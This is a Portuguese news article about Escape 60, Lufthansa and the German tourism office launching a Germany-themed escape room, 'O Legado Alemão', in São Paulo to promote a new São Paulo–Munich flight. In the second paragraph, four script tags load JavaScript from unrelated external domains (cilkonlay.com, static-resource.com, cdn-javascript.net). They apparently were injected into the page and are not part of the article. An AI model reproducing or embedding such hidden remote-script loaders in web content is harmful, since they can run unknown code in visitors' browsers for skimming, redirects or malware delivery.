Experiência de Marca

Escape 60 e Lufthansa inauguram sala inspirada na cultura alemã

Inspirada em diversos elementos da cultura alemã, a novidade faz parte das ações que marcam o início da rota direta ligando São Paulo a Munique - que começa a operar em 3 de dezembro. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573088980417" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

Novidade foi desenvolvida para promover a nova rota São Paulo-Munique.

O Escape 60, rede de franquias pioneira no desenvolvimento de jogos de fuga, em parceria com a Lufthansa e com o Centro de Turismo Alemão (DZT), anuncia a sala "O Legado Alemão", que estará disponível de 11 a 25 de novembro, na unidade Vila Olímpia, São Paulo.

O melhor do entretenimento está aqui.

Mais sobre turismo no Brasil e no Exterior aqui.

Inspirada em diversos elementos da cultura alemã, a novidade faz parte das ações que marcam o início da rota direta ligando São Paulo a Munique – que começa a operar em 3 de dezembro.

A diretora do DZT no Brasil, Margaret Grantham, lembra que a retomada da rota contribuirá ainda mais para ampliar a presença de brasileiros no Sul da Alemanha. “De janeiro a julho, essa região recebeu pouco mais de 28 mil turistas brasileiros, um aumento de 3,2% comparado ao mesmo período do ano anterior. E os visitantes brasileiros já são responsáveis por quase 11 mil pernoites mensais na cidade da Baviera, famosa por promover a Oktoberfest.”, revela Margaret.

A sala conta a história de uma herança deixada para os jogadores por um tio alemão. Para resgatar esse tesouro, que inclui o legado da família, os participantes precisarão de muita persistência e união, além de jogo de cintura para correr contra o tempo e vencer esse desafio em apenas 60 minutos.

Para Jeannette Galbinski, sócia e diretora de marketing do Escape 60, a parceria reforça o pioneirismo da marca e o compromisso de inovar sempre. “Estamos superempolgados em lançar a primeira sala com a temática de um país no Escape 60 e por nos unirmos a uma empresa que também busca surpreender seus clientes com ações inovadoras. Certamente iremos ampliar nosso alcance com essa novidade e fidelizar ainda mais nossos escape lovers.”, avalia Jeannette.

“Estamos muito animados em oferecer aos brasileiros a oportunidade de vivenciar uma experiência Lufthansa e conhecer um pouco mais sobre Munique por meio de uma atividade lúdica.”, afirma Annette Taeuber, diretora de Vendas do Lufthansa Group para o Brasil.

Para participar, é necessário estar em um grupo de, no mínimo, quatro pessoas, e, no máximo, oito. Os ingressos são vendidos exclusivamente por meio do site, via PagSeguro.